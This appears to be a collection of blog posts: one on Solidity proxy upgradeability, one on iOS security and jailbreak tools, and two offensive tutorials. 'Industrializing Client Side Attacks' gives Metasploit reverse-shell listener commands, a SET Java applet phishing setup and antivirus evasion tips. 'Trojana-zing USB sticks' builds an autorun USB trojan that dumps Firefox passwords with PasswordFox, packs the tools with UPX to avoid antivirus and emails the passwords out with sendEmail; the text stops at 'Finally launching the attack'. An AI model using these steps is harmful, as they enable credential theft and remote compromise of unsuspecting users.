Solidity Smart Contract Upgradeability

Introduction 

This article is going to focus on Smart Contract upgradability, why this important and how can we achieve it. When dealing with Smart Contracts we need to be able to upgrade our system code. This is because if security critical bugs appear , we should be able to remediate the bugs. We would also want to enhance the code and add more features. Smart Contract upgradability is not as simple as upgrading a normal software due to the blockchain immutability.

 

As already mentioned by design, smart contracts are immutable. On the other hand, software quality heavily depends on the ability to upgrade and patch source code in order to produce iterative releases. Even though blockchain based software profits significantly from the technology’s immutability, still a certain degree of mutability is needed for bug fixing and potential product improvements.

 

Preparing for Upgrades   

In order to properly do the upgrade we should be focusing in the following aspects of the project:

• Have money management strategies in place
• Create a pause functionality 
• Have paths to upgrades
• Switching addresses
• Switching Oracles
• Proxy contracts 

The mentioned functionality is mandatory in order to properly maintain and do risk management on your system. The money management strategy has to do with were and how we hold the funds and the system data. The switch address is related to the proxy contract and the rest have to do with the flow paths we designed to upgrade the smart contracts [1]. 

Proxy Contract

The basic idea is using a proxy for upgrades. The first contract is a simple wrapper or "proxy" which users interact with directly and is in charge of forwarding transactions to and from the second contract, which contains the logic. The key concept to understand is that the logic contract can be replaced while the proxy, or the access point is never changed. Both contracts are still immutable in the sense that their code cannot be changed, but the logic contract can simply be swapped by another contract. The wrapper can thus point to a different logic implementation and in doing so, the software is "upgraded"

Note: This abstract proxy contract provides a fallback function that delegates all calls to another contract using the EVM instruction delegatecall. We refer to the second contract as the implementation behind the proxy, and it has to be specified by overriding the virtual _implementation function. Additionally, delegation to the implementation can be triggered manually through the _fallback function, or to a different contract through the _delegate function. 

The most immediate problem that proxies need to solve is how the proxy exposes the entire interface of the logic contract without requiring a one to one mapping of the entire logic contract’s interface. That would be difficult to maintain, prone to errors, and would make the interface itself not upgradeable. Hence, a dynamic forwarding mechanism is required [1].

Proxy Setup

Below we can see that the contract proxy has one to one relationship with all the logic contract proxy. An this is important in order to understand that this setup kind of breaks the immutability of the blockchain.

 

References:

• docs.openzeppelin.com [1]
  

The Hackers Guide To Dismantling IPhone (Part 1)

Introduction

Hello everybody, it has been a while since I made a post, but this time is going to be a really long long post (that is why I am going to brake it in many parts). Lately my interest has significantly increased as far as the iOS platform is concerned.  The iOS is becoming more and more popular among the financial business sector companies so it came for me the time to expand my knowledge on IPhone devices. Plus since the complete industrialization of hacking (mostly because of the Chinese government, unit something is doing a good job) nowadays knowledge in iOS platforms is critical (they pay good money for iHacking). This post is going to include only hardening information and explain what the security measures are to block exploits and prevent buffer overflows etc. The second post is going to include network attacks and the third post is going to include attacks in the data of an iDevice.

Note: iOS the most advanced OS for mobile devices ever created (just kidding, I love Apple).

This blog post is going to focus on how to perform a complete penetration test on an iOS application, no time is going to be wasted on how to pentest the server component since the threat land scape is almost identical to that of a Web Application or a Web Service, and since you read my blog (if you don't start doing it) you should know by now that I covered most types of attacks for Web Applications and Web Services so far.

The iOS history

Since the release of the original iPhone in 2007, Apple has engaged in a cat-and-mouse game with hackers to secure their suite of devices for what has grown to nearly 100 million end users. Over this time, many improvements have been made to the security of the iOS, and the stakes have been raised by their introduction into circles with far greater security requirements.

What iOS is

iOS is Apple's mobile operating system, which is derived from Mac OS X, with which it shares the Darwin foundation, and is therefore a Unix-like operating system. Being developed originally for the iPhone, it then has been used on the iPod Touch, iPad and Apple TV as well. So in this article the iOS term specifically refers to the mini-operation system that run on all the iDevices (iPhone, iPod, iPad and Apple TV. In this little apple operation system, there are four abstraction layers: the Core OS layer, the Core Services layer, the Media layer, and the Cocoa Touch layer, which in total will roughly use 500 megabytes of the devices storage.

Note: The Core OS layer is written in C, while the higher layers that runs all interesting applications is written in Objective-C. The higher layer is the most interesting as far as the attacks are concerned.

For security and commercial reasons and considerations, Apple does not permit the OS to run on third- party hardware and also has a limitation on the usage of iOS on these iDevices. Therefore iOS has been subject to a variety of different hacking methods focusing on attaching functionality not supported by Apple. This hacking procedure is called iOS Jailbreak.

The iOS security architecture

While Apple was designing iOS operating system decided to increase the security by using various "tricks", (obviously iOS is based on the same core technologies as OS X) to reduce the attack surface. The attack surface is the code that processes attacker supplied input (e.g. SMS messages, Safari Web Pages etc.).  One of the many ways it did that was by not including various software packages in iOS (e.g. Java and Flash are unavailable). This automatically translates to iOS not processing Java and Flash input (Java and Flash have a history of security vulnerabilities). Another trick that Apple did to reduce the attack surface was to striped off part the functionality provided by the default software that comes installed with the iOS (e.g. Mobile Safari does not support some Adobe features).  Also the iOS OS was also stripped off from many applications compared to OS X e.g. the /bin/sh software is not included in iOS, which translates that if you write an exploit for iOS you would have to implant your own shell to your exploit, which means that your exploit would have to increase its size etc.

More on iOS security

Some of the core security features referenced per layer are: 

• System architecture: The secure platform and hardware foundations of iPhone, iPad, and iPod touch.
• Encryption and Data Protection: The architecture and design that protects the user’s data when the device is lost or stolen, or when an unauthorized person attempts to use or modify it.
• Network security: Industry-standard networking protocols that provide secure authentication and encryption of data in transmission.
• Device access: Methods that prevent unauthorized use of the device and enable it to be remotely wiped if lost or stolen.

Layered security mechanisms allow for the validation of activities across all layers of the device. From initial boot-up to iOS software installation and through to third-party apps, each step is analyzed and vetted to ensure that each activity is trusted and uses resources properly.

The following picture shows the security model of iOS, as described from above:

Note: Check out that the Apple root certificate installed in the iDevice ROM. Also that iDevices contain their own hardware crypto engines (impressive ee?). Once the system is running, this integrated security architecture depends on the integrity and trustworthiness of XNU (the iOS kernel). XNU enforces security features at run-time and is essential to being able to trust higher-level functions and apps.

More More on iOS security

Apple takes security very seriously and this is obvious from the security controls that are enforced during the execution of third party applications and iOS default pre-installed applications. The security controls explained here is required knowledge to understand how to pentest an iDevice and to later on set the threat landscape. The iOS OS basically enforces Mandatory Access Control (MAC) using the  security controls explained below.

The security controls enforced are listed below:

Least Privilege Principle: System files and resources are also shielded from the user’s apps. The majority of iOS runs as the non-privileged user "mobile", as do all third-party apps. The entire OS partition is mounted read-only. Unnecessary tools, such as remote login services, aren’t included in the system software, and APIs do not allow apps to escalate their own privileges to modify other apps or iOS itself.

Access by third-party apps to user information and features such as iCloud is controlled using declared entitlements. Entitlements are key/value pairs that are signed in to an app and allow authentication beyond run-time factors like unix user ID. Since entitlements are digitally signed, they cannot be changed. Entitlements are used extensively by system apps and daemons to perform specific privileged operations that would otherwise require the process to run as root. This greatly reduces the potential for privilege escalation by a compromised system application or daemon. 

Code Signing: To ensure that all apps come from a known and approved source and have not been tampered with, iOS requires that all executable code be signed using an Apple-issued certificate. Now given that individual developers need to test out their applications on iDevices and enterprises need to distribute apps just to their devices, there is a need to run apps without being signed by Apple. The method to allow this is called provisioning. An individual developer, a company, an enterprise or a university may sign up for one or more of the programs offered by Apple for this reason, in order to enable signing their code.

As part of the program, each developer generates a certificate request for a development and a distribution certificate from a set of private keys generated locally (e.g. by using openssl or a local certificate authority etc.). Apple then replies back with these two certificates. For more information see iOS developer program link.

Through the iOS developer portal then you can generate a provisioning profile. A provisioning profile is nothing more than a .plist file signed by Apple. The .plist file all is doing is list certificates, devices and entitlements (entitlement are configuration files describing what an app is allowed and not allowed to do). When this provisioning profile is installed (e,g, through the IPhone Configuration Utility or a third party Mobile Device Management software). 

The  developer provisioning profile can be used only for 100 devices (the devices listed have to be specific), while the enterprise provisioning does not have that limitation. Essentially provisioning adds accountability to all the apps that are allowed to be installed to an iDevice. 

The following screenshot shows the IPhone Configuration Utility:

Note:  This is obviously is not a signed profile, configured locally from my IPhone Configuration Utility.

The following picture show an enterprise configuration installed and how it shows through the iPhone configuration:

Note: See how the certificate show in the screenshot. This demonstrates the BOMGAR MDM software, that enforces a custom configuration profile.

Sand-boxing: All third-party apps are "sandboxed", so they are restricted from accessing files stored by other apps or from making changes to the device. This prevents apps from gathering or modifying information stored by other apps. Each app has a unique home directory for its files, which is randomly assigned when the app is installed. If a third-party app needs to access information other than its own, it does so only by using application programming interfaces (APIs) and services provided by iOS. The downside of this security model is that same rules apply for all apps (a third party app is not allowed to have more restrictive rules than another).  

Address space layout randomization (ASLR): ASLR protects against the exploitation of memory corruption bugs. Built-in apps use ASLR to ensure that all memory regions are randomized upon launch. Additionally, system shared library locations are randomized at each device start-up. Xcode, the iOS development environment, automatically compiles third-party programs with ASLR support turned on.

NX Flag:  Further protection is provided by iOS using ARM’s Execute Never (XN) feature, which marks memory pages as non-executable. Memory pages marked as both writable and executable can be used only by apps under tightly controlled conditions: The kernel checks for the presence of the Apple-only “dynamic-codesigning” entitlement. Even then, only a single mmap call can be made to request an executable and writable page, which is given a randomized address. Safari uses this functionality for its JavaScript JIT compiler.

Jailbreaking your iOS

Jailbreaking is a process that allows these iDevices users to gain the infamous root access to the command line of the iOS operating system, in order to remove usage and access limitations imposed by Apple. Once jailbroken, iPhone users are able to download extensions and themes that are unavailable through the App Store (via installers such as Cydia) and perform other tasks that are not possible on store-bought devices, including installing non-Apple operating systems such as Linux, running multi-task on old version of iDevices (the new Generation of store-bought devices includes this function). Through the authentication server developed by Aurik (a Ph.d student from UCSB) built up to sign old firmware of iOS, Cydia creator Jay Freeman estimates that over 10% of all iPhones are jailbroken.

Tools you can use for jailbreaking your iPhone are listed alphabetically below (found in theiphonewiki.com):

A
    •    Absinthe
B
    •    Blackra1n
C
    •    Corona
D
    •    Dual Boot Exploit
E
    •    Evasi0n
G
    •    Greenpois0n (jailbreak)
I
    •    IBrickr
    •    ILiberty+
    •    INdependence
J
    •    JailbreakMe
L
    •    Limera1n
M
    •    Mknod
P
    •    Pwnage
    •    PwnageTool
R
    •    Ramdisk Hack
    •    Redsn0w
    •    Redsn0w Lite
    •    Restore Mode
S
    •    Seas0nPass
    •    Sn0wbreeze
    •    Soft Upgrade
    •    Spirit
    •    Star
    •    Symlinks
Z
    •    ZiPhone

Note1: This tutorial was written on 09/March/2013 so an update by performing a research is also required.

Note2: The real question here is do you need to jailbreak your iDevice to pentest it?  The answer is it depends, for example if the app you are testing has anti-jailbreaking countermeasures then maybe no, if the app you are testing has no anti-jailbreaking countermeasures then definitely yes. Jailbreak the the testing target iPhone is must when applicable.

Settings the threat landscape for iOS

What most iOS developers/security consultants do not understand is the threat landscape that is currently associated with the iOS platforms is not clearly defined in their minds, some of them do not even have a clue what is that it should be taken into consideration when performing a Security Assurance, Risk Assessment or Penetration Test to iOS related platform. An iDevice should be treated the thick client on steroids. The features provide from an iOS device are amazing and very rich.

A good source that can be used as a starting point for developing a threat model for iOS should be the OWASP Mobile Security Project found here. The Top 10 Mobile Risks, Release Candidate v1.0 covers pretty much all risks that are associated with an iOS device. The following picture summarizes all risks identified: 

 Note: Risk M2, M5 and M6 are mostly server side related and I am not going to focus on these issue a lot.

Risk M1, M4, M8, M7, M9 and M10 are the most interesting of all the issue and I am going to spend a lot of time analyzing these issues. But before we do that it would be wise to focus a little in the type of interaction an iDevice has with the server component.  Given the nature of the iOS based devices, and their willingness to blindly accept new configuration, hijacking both cellular traffic and WiFi traffic can usually be performed much more easily than a similar attack to a desktop machine. It is so easy, in fact that, that a device's traffic can be hijacked without even compromising the device itself. There are a number of ways to intercept network traffic across local networks; dozens of articles have been written on the subject.  

The following picture shows a typical Web Server iPhone interaction:

Note: This is a simple Web Server, iPhone interaction.

The following pictures shows a typical attack scenarios that can be implemented very easily by exploiting the iPhone configuration of blindly accepting any wireless access points.

The following pictures shows a typical Man In The Middle attack scenarios that can be implemented again very easily due to the nature of the mobile (which by the way are mobile).

Note: The types of attacks that can be performed using the methodology of a rouge access point or the Man In The Middle attack scenarios are going to be explained in the next post.

Epilogue

This article covered the threat land scape for iDevices, which is identical for all mobile devices (e.g. iPhone, iPad, iTouch, iPad mini, Android devices etc.). The next part is going to cover Internet/Wireless attacks and the third is going to cover iDevice data attacks (e.g. attacking unencrypted and encrypted attacks). There might be though a fourth part that sums up all attack patterns together.   

See part 2 

Reference:

1. Hacking and Securing iOS Applications (1st Edition).
2. iOS Hacker's Handbook 
3. http://theiphonewiki.com/wiki/Main_Page
4. http://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CFgQFjAB&url=http%3A%2F%2Fwww.mcafee.com%2Fuk%2Fresources%2Fwhite-papers%2Ffoundstone%2Fwp-pen-testing-iphone-ipad-apps.pdf&ei=Qao3UdfuIsi0PN_igZgL&usg=AFQjCNEcgkmrLlHGnZAbIqsMAUZo7AV40Q&sig2=SVQsXTDllnOzoSiE0b9xnQ&bvm=bv.43287494,d.ZWU&cad=rja
5. http://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CEEQFjAC&url=http%3A%2F%2Freverse.put.as%2Fwp-content%2Fuploads%2F2011%2F06%2Fios_jailbreak_analysis.pdf&ei=Lq03UbeEG4vTPICwgZAF&usg=AFQjCNFEFYQasjKS015rXOIscZcD7gt0SQ&sig2=b9zMPuqnxltdEjscnBw9kA&bvm=bv.43287494,d.d2k&cad=rja
6. http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&docid=uXJZS5Ygd8EA2M&tbnid=bBuu1xIxavm7BM:&ved=0CAUQjRw&url=http%3A%2F%2Finstitute.mobileappmastery.com%2Fiostrainingpack%2Fios-training-pack-orientation%2F&ei=f_c4Ueq4GMbM0AXHwIH4CA&psig=AFQjCNGXxNtGeXVosrZpTPL02jXebHN5KA&ust=1362774242464377 
7. http://www.techotopia.com/index.php/Working_with_iOS_6_iPhone_Databases_using_Core_Data 
8. https://www.owasp.org/index.php/OWASP_Mobile_Security_Project
9. http://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0CDEQFjAA&url=http%3A%2F%2Fimages.apple.com%2Fipad%2Fbusiness%2Fdocs%2FiOS_Security_May12.pdf&ei=E407UZH6Io2o0AXp1oDoDA&usg=AFQjCNEEEm92vnkqK28D_y3D60VtJiYOTg&sig2=go27HN00qxc7oZ3cXgFecw&bvm=bv.43287494,d.d2k&cad=rja 
10. http://support.apple.com/kb/HT1808 
11. https://developer.apple.com/programs/ios/ 

Industrializing Client Side Attacks

Introduction

Cybercrime has evolved into an industry whose value in fraud and stolen property exceeded one trillion dollars in 2009. By contrast, in 2007, professional hacking represented a multibillion-dollar industry. What explains this rapid growth? Industrialization. Just as the Industrial Revolution advanced methods and accelerated assembly from single to mass production in the 19th century, today’s cybercrime industry has similarly transformed and automated itself to improve efficiency, scalability, and profitability.

The industrialization of hacking coincides with a critical shift in focus. Previously, hackers concentrated attacks on breaking perimeter defences. But today, the goal has changed. The objective is no longer perimeter penetration and defense. Today’s hacker is intent on seizing control of data and the applications that move this data. This is why attacks against Web applications constitute more than 60 percent of total attack attempts observed on the Internet.

Today's Hacking Scene

Today’s complex hacking operation now utilizes teamwork, global coordination, and sophisticated criminal techniques designed to elude detection. In recent years, a clear definition of roles and responsibilities has developed within the hacking community forming a supply chain that resembles that of a drug cartel. Additionally, the machine of choice is the botnet – armies of unknowingly enlisted computers controlled by hackers. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. Researchers estimate that some 14 million computers have already been enslaved by botnets.

Improvements in automated and formalized attack tools and services have introduced a new set of security problems for businesses.  Of the top 10 data breaches in 2009, half involved stolen laptops, while the other half involved Web and database assaults.

Client side attacks are on the rise

Client-side vulnerabilities are among the biggest threats facing users, nowadays's there has been a slight shift to the client side because server-side applications have been targets for attackers since 2001, and these applications have matured somewhat. Attackers are also going after weaknesses in desktop applications such as browsers, media players, common office applications and e-mail clients. The remedy is to maintain the most current application patch levels, keep antivirus software updated and seek and remove unauthorized applications.

Understanding client side attacks

In order to understand client-side attacks, let us briefly describe server-side attacks that we can contrast to client-side attacks. Servers expose services that clients can interact with. These services are accessible to clients that would like to make use of these services. As a server exposes services, it exposes potential vulnerabilities that can be attacked. Merely running a server puts oneself at risk, because a hacker can initiate an attack on the server at any time.

Client-side attacks are quite different. These are attacks that target vulnerabilities in client applications that interact with a malicious server or process malicious data. Here, the client initiates the connection that could result in an attack. If a client does not interact with a server, it is not at risk, because it doesn’t process any potentially harmful data sent from the server.

A typical example of a client-side attack is a malicious web page targeting a specific browser vulnerability that, if the attack is successful, would give the malicious server complete control of the client system. Client-side attacks are not limited to the web setting, but can occur on any client/server pairs, for example e-mail, FTP, instant messenging, multimedia streaming, etc.

Clients are only protected in environments where access from internal clients to servers on the Internet is restricted via traditional defenses like firewalls or proxies. However, a firewall, unless combined with other technologies such as IPS, only restricts network traffic; once the traffic is permitted, a client interacting with a server is at risk. More advanced corporate server filtering solutions are available, but typically these only protect limited set of client technologies.

Drop-ing the payload

There are various way an a attacker can drop her payload to the targeted workstation or laptop, some of them are listed below:

1. Through clicking evil links hiding malicious payloads hold on a malicious server controlled by the attacker.
2. Through vulnerable web servers by either compromising them or exploiting vulnerabilities on them.
3. Through Man In The Middle attacks.
4. Through phishing e-mails also holding malicious payloads.
5. Through various other attacks that are out of the scope of this article.

The following image shows one of the most popular ways to "seduce" a user into clicking on a malicious web site:

Note: This is an old fashioned attack approach, very well replicated by the penetration testing community during hacking attack. Of course social engineering is also used through out that process.

The actual attack simplified 

All you need to perform this type of attack is the Social Engineering Toolkit (SET) and Metasploit, well not exactly, that is not true if you are targeting high profile targets. But first lets explain the simplified version of the attack. In order the perform client side attack to a user that is NOT protected by some serious hardening such as a reverse SSL proxy with content inspection features and a firewall with proper egress filtering then the tools mentioned above will do the job. By using the tools described above the following steps have to be taken:

1. Set up a listener bind to a public IP or DNS name.
2. Demonize the listener. 
3. Research the victims laptop software and hardware. 
4. Social engineer the user to download and execute it to her laptop.
5. Use proper payloads for post exploiting the victim.

Note:  Again this is a simplified attack sequence and is not going to work in a laptop or workstation that is hardened and the user is not allowed to install software.

Setting up the listener

So after we successfully generate the desired payload,using SET, and verify that it is a valid payload, by issuing the commands listed below we move forward on how to launch the handler on the attackers machine, so in order to do that we type the following commands in the order given below:

1. cd /pentest/exploits/framework3
2. ./msfconsole 
3. msf > use exploit/multi/handler
4. msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_tcp
5. msf exploit(handler)> set LHOST publicIP
6. msf exploit(handler)> set LPORT 123
7. msf exploit(handler)> exploit -j

Note:  The attackers machine should be accessible some how from victims machine (e.g. by using a publicly static IP or DynDNS).

Generating the payload and setting up the clone

SET is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET has a feature called “set-automate” which will take an answer file as an input and enter the commands in the menu mode for you. So for example if I wanted to do the Java Applet I would create a file with the following text:

1
2
1

https://gmail.com no

Now lets name the file mySET.txt, the command that will execute a java applet attack would be:

root@bt:/pentest/exploits/set# ./set-automate mySET.txt 

Note: The described configuration will launch a multiple web-based attack from SET using the Java Applet attack method by embedding a malicious Java Applet to a gmail clone. SET will also launch the listener but it would better if you do it manually.

After a successful compromise

If the victim is properly social engineered and execute the payload then the meterpreter agent will launch back a remote shell connection. The Meterpreter (short for Meta Interpreter) payload will give an attacker a presence in memory only payload, and reduce the attackers need to touch disk to zero. Metasploit will upload a DLL (Meterpreter) to the remote host; the uploaded DLL will be stored in the compromised processes heap. Meterpreter once loaded offers the attacker a plethora of options.

Once Meterpreter’s staged shellcode has been executed and Meterpreter has been loaded, communication begins. Meterpreter’s communication and extensibility are what makes it so valuable to an advanced attacker. For the purposes of this article think about the attacker as the client, and the victim as the server.Meterpreter uses a protocol called Type Length Value (TLV).

Why the above methods wont work on a corporate environment

When referring to a hardened corporate environment a set of prevention technologies is used to protect the user workstations such as anti-virus software, endpoint security software with personal firewall, web gateways performing deep content inspection to non-encrypted connections, reverse SSL proxies filtering all SSL connections that validate certificates and finally IDS/IPS devices are also included. So the reason an amateur will fill is:

1. Many advanced payloads do not work very well running in x86-64 (Windows).
2. Very restrictive inbound and outbound firewall rules are applied.
3. Proxy authentication is required for outgoing connections.
   

Note:  These are not the only reasons just the most basic.


Bypassing defenses

There are numerous techniques defeating all defenses mentioned above some of them are:

1. Code signing certificate for the payload (e.g. for the Meterpreter executable or the Meterpreter malicious Java Applet).
2. A SSL certificate from a trustworthy Certificate Authority, for the payload communication protocol.
3. Use costume communication protocol instead of the one used by the Meterpreter since you don't want to be detected and blocked because you’re mimicking the behavior of a well-known hacking tool.The Metasploit meterpreter reverse_http(s) payload contains the string "Meterpreter" on the User-Agent variable.
4.  Create a custom payload or add your own evasion techniques, this way almost any signature detection system can be bypassed.
5. Avoid process dll injection while delivering the payload. The latest versions of windows enforce session separation so some of the methods may not work on the latest version of windows like windows 7/8.

Why code signing is not secure

Code signing can provide several valuable features. The most common use of code signing is to provide security when deploying; in some programming languages, it can also be used to help prevent namespace conflicts. Almost every code signing implementation will provide some sort of digital signature mechanism to verify the identity of the author or build system, and a checksum to verify that the object has not been modified. It can also be used to provide versioning information about an object or to store other meta data about an object.

Many code signing implementations will provide a way to sign the code using a system involving a pair of keys, one public and one private, similar to the process employed by SSL or SSH. For example, in the case of .NET, the developer uses a private key to sign their libraries or executables each time they build. This key will be unique to a developer or group or sometimes per application or object. The developer can either generate this key on their own or obtain one from a trusted certificate authority (CA).Of course it is not so difficult to sign a malicious code, unauthorized digital certificates have been found that chain up to a Microsoft sub-certification authority issued under the Microsoft Root Authority that can be used to sign malicious code.

More specifically components of the Flame malware were found to be signed with a certificate that chained up to the Microsoft Enforced Licensing Intermediate PCA certificate authority, and ultimately, to the Microsoft Root Authority. This code-signing certificate came by way of the Terminal Server Licensing Service that operate to issue certificates to customers for ancillary PKI-based functions in their enterprise. Such a certificate could (without this update being applied) also allow attackers to sign code that validates as having been produced by Microsoft.

Why valid certificates are not secure

Obtaining a valid certificate and using it with SET is easy. The fact that this is easy can be verified by numerous web site reporting compromised certificates, one of them is this one:

•  http://www.ccssforum.org/malware-certificates.php

This is an extract from the web site with a long list of compromised certificates: "The following is a list of digital certificates that have been reported by the forum as possibly being associated with malware to various certificate authorities. This information is intended to help prevent companies from using digital certificates to add legitimacy to malware and encourage prompt revocation of such certificates." 

Obfuscating Meterpreter

It is really easy to obfuscate Meterpreter,  in the following post http://spareclockcycles.org/tag/meterpreter/ the person that owns the blog explains that he/she managed to obfuscate the Meterpreter by writing a XOR program in python. The following extract is from the blog:

"What surprised me during all of this was how ridiculously easy it is to do just that. About 60 lines of Python (I know, way too many) and 20 lines of C was all it took to take my detection rate from 40% to 1% (32 bit version / 64 bit version). The Python code largely is just to automate things, but it also made the XOR crypting easier and allowed me to more easily embed arbitrary executables in my code (which is useful in embedding other, non-metasploit payloads)."

Epilogue

The drop-ing payload is a very important part of a social engineering attack. If you are doing all the other stages like a professional but use an average payload you won't get the great results you expect. Client-side attacks and social engineering should be included in every penetration testing engagement, if you are not testing for social engineering attacks a very significant attack vector that real hackers use will be skipped.     


References:

1. http://www.scmagazine.com/what-ceos-should-know-about-advanced-persistent-threats-and-industrialized-hacking/article/168534/
2. http://www.google.ie/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDQQFjAD&url=http%3A%2F%2Fwww.imperva.com%2Fdocs%2FWP_Industrialization_of_Hacking.pdf&ei=4INLUOmvNIW2hQfoyoHACA&usg=AFQjCNGK3zxXrOHOIf829XOEPI78FFWcjw&sig2=VzVIvZmXY8--Vwp3ACm9aw&cad=rja
3. http://www.honeynet.org/
4. http://www.networkworld.com/news/2007/112807-client-side-attacks-rise.html
5. http://blog.spiderlabs.com/2012/08/client-side-payload-the-brazilian-way.html
6. http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29
7. http://securityxploded.com/dll-injection-and-hooking.php
8. http://en.wikipedia.org/wiki/Code_signing
9. http://blogs.technet.com/b/srd/archive/2012/06/03/microsoft-certification-authority-signing-certificates-added-to-the-untrusted-certificate-store.aspx
10. http://spareclockcycles.org/tag/meterpreter/

Trojana-zing USB sticks

USB nowadays 

Now days most of us have a USB flash drive (sometimes also referred to as a USB stick, USB memory stick or simply a flash drive) that what we use when we want to store data temporarily. They are really small and lightweight and are very practical when you want to move files from one computer to another.

That is all fine, but what happens when none trusted USB’s are inserted in our USB stick drives, how difficult is it for someone to steal and e-mail all our passwords within seconds? Well the answer for someone that knows is simple, a few seconds is more than enough for someone to collect all your passwords from your laptop.

USB flash drives are used when data is moved between home and office. They are also often used when data is moved inside an office, for example when moving data to/from a computer that is not connected to a network. Obviously that is the main reason that a PC not connected to internet can be infected with Trojans, viruses and other malicious software. A very well known worm that had a great impact worldwide is Conflicker [9].  Conflicker initially did not use USB’s as a infection medium, but later on it updated itself and started infecting USB stick, and that was when the spreading increased dramatically.

Trojan-azing a USB stick

How difficult is for someone to convert a USB stick into a Trojan? Well this article is going to so you that even a person with little to no knowledge of computers can steal and e-mail your passwords using open source and freeware software to construct a USB Trojan that is practically not traceable from industry software antivirus, because this programs are legitimate programs, but when combined together can do real damage.

The key components of constructing a USB Trojan would be:

1. The password collector (e.g. tool that is going to collect your password).
2. The transportation method (e.g. method to send over Internet the stolen passwords).
3. A compressor (e.g. reduce the payload size )
4.  The execution method (e.g. the method to execute the desired payload when USB is inserted to the target PC).

Well the first tool to use would be the password collector, for the purpose of this article I am going to use PasswordFox, for the transportation method I will use SMTP along with a tool called Sentmail and for the execution method I will use Autorun. 

About SendEmail our Communication Channel

SendEmail is a lightweight, command line SMTP email client. With it you can send e-mails from a command line, this free program is perfect, simple to use and feature rich. It was designed to be used in bash scripts, batch files. SendEmail is written in Perl (but can also run as a standalone executable in windows) and is unique in that it requires NO MODULES. It has an intuitive and flexible set of command-line options, making it very easy to use. SendEmail is licensed under the GNU GPL, either version 2 of the License or any later version.  Supported Platforms are Linux, BSD, OS X, Windows 98, Windows NT, Windows 2000, & Windows XP. [1]

The following picture show a screen shot of the Sentmail help from command line:

 

Note: Sentmail also supports TLS but for the purposes of this article we are not going to use the TLSv1.0 option, although it might be a good idea to do it if you want to bypass reverse SSL proxies or content inspection devices.

Why use Sentmail?

I think that is obvious how Sentmail can be used for malicious purposes such as spamming, e-mail spoofing attacks, and automated virus distribution e.t.c.  , a malicious user can simply integrate the Sentmail executable to another executable (e.g. notepad.exe) as a Trojan  using a packer such as upx  [2] or IExpress Wizard [3] , upload the executable in his/her web site and then use social engineering to convince innocent users to download and execute the maliciously altered  executable. But the most interesting characteristics of Sentmail are that it is a standalone executable and its size is only 692 KB.

About PasswordFox as our Password Collector

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signors filename.  This utility works under Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows 7. Firefox should also be installed on your system in order to use this utility. [4]

Why Use PasswordFox

PasswordFox doesn't require any installation process or additional DLL files, but firefox browser must be installed on your computer in order allow PasswordFox to grab the targeted passwords list. PasswordFox is again a standalone executable and in order to start using PasswordFox, you can simply double click the executable file.

After running it, the main window will display your entire passwords firefox list for the last profile that you used.  That’s not all PasswordFox can do. PasswordFox can also run from command line and splash you firefox password list into a txt file. Also the tool size is ridiculously small only 40 KB, amazing what 40 KB can do to your firefox password profile eee?

The following screen shot shows how we can actually use PasswordFox from command line is:

Note:  Not much to see, PasswordFox tool does not support the help command. Check out the /stext options used, this option is going to export all my firefox passwords into the txt file named pass.txt.

About UPX as our Compressor

UPS is a freeware high quality executable compressor, and ideal for our job.  The UPX author claims that it has a better compression rate than that of WinZip/zip/gzip with no memory overhead for your compressed executables. UPX is distributed with full source code under the GNU General Public License v2+, with special exceptions granting the free usage for commercial programs as stated in the UPX License Agreement. [2]

Compressing our executables

We will compress our executables using UPX for two main reasons, first to reduce antivirus detection possibility and second to reduce the size of our executables.  Antivirus bypassing is not so easy to achieve and out of the scope of this article. So let’s go on and compress our executables.  From the command line the commands we have to issue are:

1. upx –brute Sentmail.exe
2. upx –brute PasswordFox.exe

The following screen shot shows the outcome of this command:

Note:  The PasswordFox.exe was already compressed with upx by the author.  

Sending our Password Collection Using Sentmail

Sending a not easily traceable e-mail is not going to be easy. We will need either use a costume valid e-mail address from publicly well known e-mail servers such as Google and Yahoo or we can use an open mail relay server.  

An open mail relay is an SMTP server configured in such a way that it allows anyone on the Internet to send e-mail through it, not just mail destined to or originating from known users. This used to be the default configuration in many mail servers; indeed, it was the way the Internet was initially set up, but open mail relays have become unpopular due to their exploitation by spammers and worms. Many relays were closed, or were placed on blacklists by other servers. [5]

For the purpose of this article we will use Google Mail Serve to send our malicious e-mail this, so the following command would do the Job:

sendEmail.exe -t  somemail@something.com -o tls=auto  -f  yourgmail@gmail.com  -u youmailsubject  -m yourmailbody  -a pass.txt -s smtp.gmail.com -xp yourpassword  -xu youusername

Note: In order to use Google mail you have to use TLS (Sentmail does support TLS, so it is not going to be a problem). The –a option add the file attachment containing the passwords.

Launching a program on a USB

Using Autorun.inf to automatically launch a program on a USB flash drive is very easy, but you have to know the windows platform (e.g. Windows 7, Vista, XP e.t.c) it depends on the version of the Windows you are targeting  the design your USB Autorun. Below I will show you how to handle this in different Windows versions. [7]

Handling different Windows versions would be mean using the keyword START and ACTION in the Autorun.inf file.  So the Autorun file would look like this in its final form:

1. [AutoRun]
2. OPEN=run.bat
3. ACTION=run.bat 

The run.bat file is a bat file (also called batch file) that you can edit with notepad and add the commands show below:

1. Start PasswordFox.exe /stext
2. Start Sentmail <parameters>

If autorun is disabled on a specific computer, you will not see the autorun menu when the flash drive is plugged in; hence the application will not start automatically. In that case you will be forced to explore the drive and run the program manually. If you need to launch the program with specific command line parameters then you can open a console window and type the parameters there, or use a .BAT script to do the same task. [10]

Finally launching the attack

